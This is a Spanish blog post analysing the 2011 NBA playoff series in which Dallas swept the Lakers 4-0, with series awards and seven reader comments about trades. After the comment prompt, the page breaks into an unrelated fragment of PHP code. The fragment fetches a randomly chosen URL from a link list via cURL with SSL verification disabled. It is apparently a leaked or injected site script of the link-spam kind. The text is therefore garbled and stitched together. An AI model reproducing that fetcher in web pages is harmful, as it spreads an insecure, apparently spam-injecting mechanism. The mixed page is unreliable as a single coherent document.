Segunda ronda del Oeste: Lakers 0 – Mavericks 4

11 de May de 2011 por TheDeerHunter

Otro “Zas en toda la boca”. A nosotros, a la mayoría de analistas mundiales y a muchos aficionados excepto quizás los más fanáticos de los Mavericks (y más de uno no las tendría todas consigo). Si se piensa bien tampoco había razones objetivas para ser tan entusiastas con los amarillos. Tan sólo una fe en abstracciones como el sobado “corazón de campeón”, el color de la camiseta, el usual cambio de cara y la mutante motivación de los pupilos del Zen, así como la tradicional tendencia a fastidiarla en el peor momento del equipo de Cuban y Carlisle. Además Phil Jackson no podía despedirse eliminado anticipadamente. No estaría bien. Los Lakers llevaban jugando muy mal demasiado tiempo. Es de justicia que un equipo tan ramplón no alcance las finales de conferencia. Por contra, los Mavs han realizado un campeonato muy digno, cada uno ha cumplido con lo suyo y venían de eliminar de forma notable un equipo duro como son los Blazers.

Tratándose de los Lakers la primera causa que viene siempre a la cabeza suele ser la motivación. Al contrario que su némesis, se trata de una franquicia que por naturaleza siempre ha tenido  cierta tendencia a gustarse demasiado, distraerse y/o caer en la prepotencia. La inmensa mayoría de las derrotas en los últimos años se han achacado a falta de actitud y, evidentemente, ahora no podía ser menos. Se tiene la creencia que los Lakers, si se ponen, ganan a cualquiera. Esto claramente bebe del propio pecado de la prepotencia porque los demás también juegan. Es imposible que en una semifinal de conferencia no se logre motivación después de prácticamente todo un curso utilizando la misma excusa. Ahora salen otras nuevas, casi todas extradeportivas. Da la sensación que los Mavericks no han tenido nada que ver en todo esto. Error.

Sin estrujarnos demasiado los sesos se aprecia una clara ventaja a favor de los tejanos que a la postre ha resultado decisiva: La profundidad de la plantilla. Carlisle ha tenido a su disposición 9-10 tíos solventes. Casi dos hombres por puesto que pueden permitirse apretar las tuercas al máximo porque la dosificación ha sido excelente. Se lo han podido permitir. Por contra, los Lakers llevaban en las piernas la mayor carga de partidos de toda la NBA en las 4 últimas campañas, competiciones internacionales a parte, además de no tener un fondo tan amplio como el de Dallas ni tampoco poseer un alto excedente físico. La edad no ayuda, para qué nos vamos a engañar. Cansancio físico y entendible cansancio psicológico. Habrá que ver cómo sortea este factor el futuro finalista de conferencia, significativamente más jóven y físico que Lakers, con una semana de descanso para los Mavs. Tampoco lo tendrán fácil. Menos si vuelve Caron Butler.

La única baza que poseía Lakers para contrarrestar ese déficit era imponer su teórico mayor potencial de talento concentrado fundamentalmente en Kobe y Gasol, la mejor pareja de la liga hasta ahora. De entrada, ni por ahí se hubiera podido esperar un diferencial inmenso porque los Mavs tampoco se chupan el dedo en ese sentido. No vamos a descubrir a Nowitzki ahora y Terry, cuando está “on fire”, puede resultar tan peligroso como cualquiera. El caso es que un Kobe mermado y un Gasol atravesando sus propios infiernos no han podido imponerse. Es algo que puede pasar. Batalla perdida.

Pero es que los Mavericks han jugado sus cartas extraordinariamente bien. La masacre de triples del último partido sólo ha sido la punta del iceberg de un momento muy dulce por el que están atravesando. Ante la generalmente mala defensa amarilla, sí, pero también cuando los Lakers han apretado los dientes y se han puesto a hacer lo que saben. A este nivel de confianza puede sufrir cualquier defensa, lo vimos contra Portland. Con Nowitzki de generatriz, Stojakovic resucitado y Terry, hay mucha artillería si llegan los balones. La distribución está funcionando a la perfección toda la postemporada. Rebotean, defienden. No todo es culpa de lo “malos” que son los Lakers.

El duelo Phil Jackson vs Rick Carlisle tampoco ha resultado como se esperaba. El todopoderoso maestro Zen no ha podido contra el “técnico de regular season”, sambenito como otro cualquiera. No tenía buena mano el viejo Phil en su última partida de póker pero tampoco ha sido nunca un creyente de ajustes radicales. Su fuerte siempre fue la planificación, sacar ventaja y hacer sangre. No se le dieron tan bien las series que se tuercen desde el principio. Quizás les hubiera venido bien alguien con otra naturaleza, que se hubiera atrevido a sacar a Artest de una eliminatoria donde a priori podía pintar poco, proteger a Fisher, apostar más fuerte por Barnes o Blake, qué sabemos… O quizás tampoco hubiera cambiado nada. Ante la duda, el criterio del que sabe prevalece y nadie ha demostrado saber más de este mundo que Phil Jackson. El trabajo de Carlisle, por la parte que le toca, impecable.

Por último, no sé si de la suerte de la eliminatoria pero sí de tanta debacle está un poco el factor suerte. Por una vez la  diosa fortuna no ha sonreído a los amarillos y milagros no ha habido.

PREMIOS

MVP: Por si hay alguna duda Dirk Nowitzki es , de largo, el que más minutos disputa en una plantilla larga y variada donde el reparto es democrático. El alemán tiraniza ese aspecto con 37 minutos y medio mientras los demás giran en torno a los 30.  En buena lógica porque en ellos le ha pegado un baile a cada par que se ha tirado a la cara. 25 puntos por partido, con un increíble 73% en tiros de tres y casi un 60% de dos. Más de 9 rebotes y 2.5 asistencias. ¡Robin Hood!!

Sorpresa: Quién nos iba a decir que Pedja Stojakovic iba a liquidar cuentas con los Lakers a estas alturas. Los 6 chuscos de 6 intentos en el último partido supieron a venganza servida en plato frío. Ha cuajado una serie formidable para un tipo al que muchos dábamos por acabado.

Decepción: Pau Gasol en el peor nivel de su carrera. Sin el catalán los Lakers bajan varios peldaños. Esperemos que esto haya sido la excepción que confirma lo bueno que todavía es, pero el mal sabor de esta serie le va a perseguir toda la vida. No va a haber piedad con él en muchos foros.

Esfuerzo en vano: Con una mancha muy grande debido a la impotencia del último partido, Odom y Bynum han sido lo poco salvable de su equipo esta postemporada. Nos quedamos con Odom, que ha sido el Laker que mejor ha podido defender su papel durante toda la temporada.

Comenta

7 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Pues lo has clavado. Los Mavs no han sido tan, tan, tan superiores en cada partido como puede indicar un 4-0, pero sí que han hecho las cosas francamente bien y desde luego que se lo merecen. Sobre todo, Dirk. Qué grande…

      Citar

  2. Hynreck dice:
    #2

    Los números de Dirk son alucinantes

      Citar

  3. -=TheKing=- dice:
    #3

    Cada vez veo a los Heat más campeones, creo que pasa algo como en estas eliminatorias de dallas y Lakeres. Un equipo es un poco superior, pero un poco superior todos los encuentros por tano es logico un 4-0 ó 4-1.
    Además veo a Lebron con unas ganas locas, cosa que le puede perjudicar como el otro día en su posesion final pero, son jóvenes, fuertes, rápidos y con calidad de sobras, son el Big three que va a marcar los próximos 3 años.

    Bueno eso a no ser que se quite Lakers a Bynum y Gasol y se traiga a Howard y un base normalillo.

      Citar

  4. Txusma dice:
    #4

    Bynum y Gasol por Howard y Nelson?

      Citar

  5. Denise dice:
    #5

    Y un huevo….:)
    Bynum y Gasol por Howard y Arenas, más alguna porquerías para cuadrar salarios.
    O en su defecto Bynum + Odom por Howard y Turkoglu.

      Citar

  6. sr. Lagarto dice:
    #6

    Yo del GM de Lakers, sinceramente, no me desprendería de Gasol. Una mancha, aunque sea grande (¿os suena un tal Rashard Lewis?), la tiene cualquiera en su expediente. Y Gasol ha demostrado en LA que es muy, muy bueno.

      Citar

  7. Denise dice:
    #7

    Yo tampoco traspasaría a Gasol. El trade que yo puse era desde el punto de vista de los Magic. Anda que no nos vendría bien Pau Gasol.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>